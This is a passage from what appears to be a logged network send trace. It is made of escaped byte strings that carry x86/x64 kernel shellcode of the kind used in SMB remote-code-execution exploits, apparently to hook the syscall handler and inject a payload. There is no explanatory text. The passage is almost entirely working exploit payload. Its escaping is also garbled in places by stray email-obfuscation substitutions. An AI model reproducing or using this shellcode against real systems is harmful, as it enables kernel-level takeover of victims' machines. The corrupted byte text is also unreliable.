\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 9, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 10, 